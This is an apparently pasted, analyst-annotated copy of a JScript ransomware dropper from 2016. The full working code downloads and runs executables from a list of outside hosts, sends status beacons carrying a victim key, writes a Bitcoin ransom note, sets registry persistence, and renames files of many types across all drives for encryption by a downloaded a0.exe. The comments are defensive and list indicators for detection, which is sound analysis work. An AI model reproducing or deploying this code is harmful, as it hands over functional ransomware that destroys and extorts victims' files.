
here's how you were forced to pay bitcoin to decrypt your fi

a guest
May 17th, 2016
  // Analyst summary: Windows Script Host (JScript) downloader and ransom-note writer.
  // These lines only set up constants and COM objects; all network, registry and file
  // activity happens in the `if` block that follows. The hostnames, Bitcoin address and
  // %TEMP% file names below are the indicators this sample exposes.
  //
  // id: opaque token sent as the `id=` query parameter on every request. The script never
  //     interprets it (presumably a campaign or affiliate tag - not established here).
  1. var id = "rWwA9ZWwhFvuBvdhjjSAHdk_5gzrJKrneBD21TBrfdLbh-T-JKWIz4sQ5QGAlALQF5tJHu8QcUkLXBFXXQ";
  // ad: Bitcoin address printed in the ransom note and sent as `ad=`.
  2. var ad = "13CBPRrF8micWLhGmY89jv8Zy85XkuxyBb";
  // bc: amount in BTC quoted in the note. Kept as a string; only used for display.
  3. var bc = "0.50508";
  // ld: index into `ll` of the last host that returned a payload; later rounds start there.
  4. var ld = 0;
  // ky: four Math.random() values rendered in base 36, up to 9 characters each, concatenated.
  //     Math.random() is not a cryptographic generator. The value leaves the host in clear
  //     text as `ky=` in plain-HTTP GET URLs and is passed on the command line of a0.exe, so
  //     proxy logs, packet captures and process command-line logging (Security event 4688
  //     with command-line auditing, Sysmon event 1) may retain it for incident response.
  5. var ky = Math.random().toString(36).substr(2, 9) + Math.random().toString(36).substr(2, 9) + Math.random().toString(36).substr(2, 9) + Math.random().toString(36).substr(2, 9);
  // cq / cs: a double quote (char 34) and a backslash (char 92) built from character codes,
  //     so the command strings assembled later contain no literal quote or backslash.
  //     NOTE(review): may also be meant to defeat naive string signatures - intent not shown.
  6. var cq = String.fromCharCode(34);
  7. var cs = String.fromCharCode(92);
  // ll: hosts tried in order for the payload download; the same list is printed in the note
  //     as "decryptor" links. Presumably compromised third-party sites - not established here.
  8. var ll = ["successcoachguru.com", "woodworking.se", "doctorentertainment.com", "www.area98.co.uk", "professional64.ru"];
  // ws: WScript.Shell, used to expand %TEMP% and to launch cmd.exe and the dropped files.
  9. var ws = WScript.CreateObject("WScript.Shell");
  // fn: "%TEMP%\a" - base path of every artefact: a.txt (note and run marker), a0.exe,
  //     a1.exe, a2.exe.
  10. var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";
  // xo: HTTP client; xa: binary stream that writes the response body to disk;
  // fo: file-system object for existence checks and for writing the note.
  11. var xo = WScript.CreateObject("Msxml2.XMLHTTP");
  12. var xa = WScript.CreateObject("ADODB.Stream");
  13. var fo = WScript.CreateObject("Scripting.FileSystemObject");
  // Main body. Runs only when %TEMP%\a.txt is absent: the ransom note doubles as an
  // "already ran" marker, so its presence on a host is itself an indicator.
  // Observable behaviour for detection: a script host making plain-HTTP GETs to /counter/,
  // writing a0/a1/a2.exe into %TEMP%, then spawning cmd.exe for REG ADD, copy and
  // `for /r ... REN ... .crypted` commands.
  14. if (!fo.FileExists(fn + ".txt")) {
  // Stage 1: three download rounds (n = 0..2). Each round walks the host list starting at
  // the last host that answered (ld) and stops at the first host that returns a payload.
  15.   for (var n = 0; n <= 2; n++) {
  16.     for (var i = ld; i < ll.length; i++) {
  // dn: set to 1 once this round has saved a payload.
  17.       var dn = 0;
  18.       try {
  // Synchronous (third argument false) GET over plain HTTP; ad, ky and id travel in the
  // query string, and rnd is the host index followed by the round number.
  19.         xo.open("GET", "http://" + ll[i] + "/counter/?ad=" + ad + "&ky=" + ky + "&id=" + id + "&rnd=" + i + n, false);
  20.         xo.send();
  21.         if (xo.status == 200) {
  22.           xa.open();
  // type 1 = binary stream, so the body is written to disk unmodified.
  23.           xa.type = 1;
  24.           xa.write(xo.responseBody);
  // Only bodies larger than 1000 bytes count as a payload; smaller replies are a miss.
  25.           if (xa.size > 1000) {
  26.             dn = 1;
  // Saved as %TEMP%\a<n>.exe; option 2 overwrites an existing file.
  27.             xa.saveToFile(fn + n + ".exe", 2);
  // a1.exe and a2.exe are started at once without waiting. a0.exe is only saved here and
  // is invoked per file in stage 2. What a1/a2 do is not visible on this page.
  28.             if (n != 0) {
  29.               try {
  30.                 ws.Run(fn + n + ".exe", 1, 0);
  31.               } catch (er) {};
  32.             };
  33.           };
  34.           xa.close();
  35.         };
  36.         if (dn == 1) {
  // Remember the working host so later rounds and the status beacons reuse it.
  37.           ld = i;
  38.           break;
  39.         };
  // Errors are swallowed: an unreachable host simply falls through to the next one.
  40.       } catch (er) {};
  41.     };
  42.   };
  // Stage 2 is gated on a0.exe having been downloaded.
  43.   if (fo.FileExists(fn + "0.exe")) {
  // Status beacon to the working host: st=start.
  44.     xo.open("GET", "http://" + ll[ld] + "/counter/?ad=" + ad + "&ky=" + ky + "&id=" + id + "&st=start", false);
  45.     xo.send();
  // Write the ransom note to %TEMP%\a.txt (overwrite allowed). The note claims RSA-1024;
  // nothing in this script performs RSA - any file transformation is delegated to a0.exe,
  // which is not part of this page, so the claim cannot be confirmed from here.
  46.     var fp = fo.CreateTextFile(fn + ".txt", true);
  47.     fp.WriteLine("ATTENTION!");
  48.     fp.WriteLine("");
  49.     fp.WriteLine("All your documents, photos, databases and other important personal files");
  50.     fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key.");
  51.     fp.WriteLine("To restore your files you have to pay " + bc + " BTC (bitcoins).");
  52.     fp.WriteLine("Please follow this manual:");
  53.     fp.WriteLine("");
  54.     fp.WriteLine("1. Create Bitcoin wallet here:");
  55.     fp.WriteLine("");
  56.     fp.WriteLine("      https://blockchain.info/wallet/new");
  57.     fp.WriteLine("");
  58.     fp.WriteLine("2. Buy " + bc + " BTC with cash, using search here:");
  59.     fp.WriteLine("");
  60.     fp.WriteLine("      https://localbitcoins.com/buy_bitcoins");
  61.     fp.WriteLine("");
  62.     fp.WriteLine("3. Send " + bc + " BTC to this Bitcoin address:");
  63.     fp.WriteLine("");
  64.     fp.WriteLine("      " + ad);
  65.     fp.WriteLine("");
  66.     fp.WriteLine("4. Open one of the following links in your browser to download decryptor:");
  67.     fp.WriteLine("");
  // Every host in `ll` is listed, keyed by the Bitcoin address (`a=`).
  68.     for (var i = 0; i < ll.length; i++) {
  69.       fp.WriteLine("      http://" + ll[i] + "/counter/?a=" + ad);
  70.     };
  71.     fp.WriteLine("");
  72.     fp.WriteLine("5. Run decryptor to restore your files.");
  73.     fp.WriteLine("");
  74.     fp.WriteLine("PLEASE REMEMBER:");
  75.     fp.WriteLine("");
  76.     fp.WriteLine("      - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.");
  77.     fp.WriteLine("      - Nobody can help you except us.");
  78.     fp.WriteLine("      - It`s useless to reinstall Windows, update antivirus software, etc.");
  79.     fp.WriteLine("      - Your files can be decrypted only after you make payment.");
  80.     fp.WriteLine("      - You can find this manual on your desktop (DECRYPT.txt).");
  81.     fp.Close();
  // Registry changes, each through a hidden, non-waited cmd.exe (Run(..., 0, 0)):
  //   HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value "Crypted" = path of the note
  //     (presumably so the note is opened at each logon);
  //   HKCR\.crypted default value = "Crypted", and HKCR\Crypted\shell\open\command =
  //     notepad.exe "<note>", so opening a renamed file shows the note.
  // These keys and values are useful host indicators and clean-up targets.
  82.     ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCU" + cs + "SOFTWARE" + cs + "Microsoft" + cs + "Windows" + cs + "CurrentVersion" + cs + "Run" + cq + " /V " + cq + "Crypted" + cq + " /t REG_SZ /F /D " + cq + fn + ".txt" + cq, 0, 0);
  83.     ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + ".crypted" + cq + " /ve /t REG_SZ /F /D " + cq + "Crypted" + cq, 0, 0);
  84.     ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + "Crypted" + cs + "shell" + cs + "open" + cs + "command" + cq + " /ve /t REG_SZ /F /D " + cq + "notepad.exe " + cs + cq + fn + ".txt" + cs + cq + cq, 0, 0);
  // Copy the note to DECRYPT.txt under two candidate Desktop paths.
  85.     ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%AppData%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
  86.     ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%UserProfile%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
  // Character codes 67..90 are the drive letters C: through Z:. For each drive one cmd.exe
  // runs a recursive `for /r` over the extension list, appends ".crypted" to every match
  // and then calls a0.exe with the renamed path and ky. Run(..., 1, 1) uses a visible
  // window and waits, so drives are processed one after another.
  // The rename burst to *.crypted and ky on the a0.exe command line are both loggable.
  87.     for (var i = 67; i <= 90; i++) {
  88.       ws.Run("%COMSPEC% /c for /r " + cq + String.fromCharCode(i) + ":" + cs + cq + " %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN " + cq + "%i" + cq + " " + cq + "%~nxi.crypted" + cq + " & call " + fn + "0.exe " + cq + "%i.crypted" + cq + " " + ky + ")", 1, 1);
  89.     };
  // Show the note in notepad, then send the final status beacon: st=done.
  90.     ws.Run("%COMSPEC% /c notepad.exe " + cq + fn + ".txt" + cq, 0, 0);
  91.     xo.open("GET", "http://" + ll[ld] + "/counter/?ad=" + ad + "&ky=" + ky + "&id=" + id + "&st=done", false);
  92.     xo.send();
  93.   };
  94. };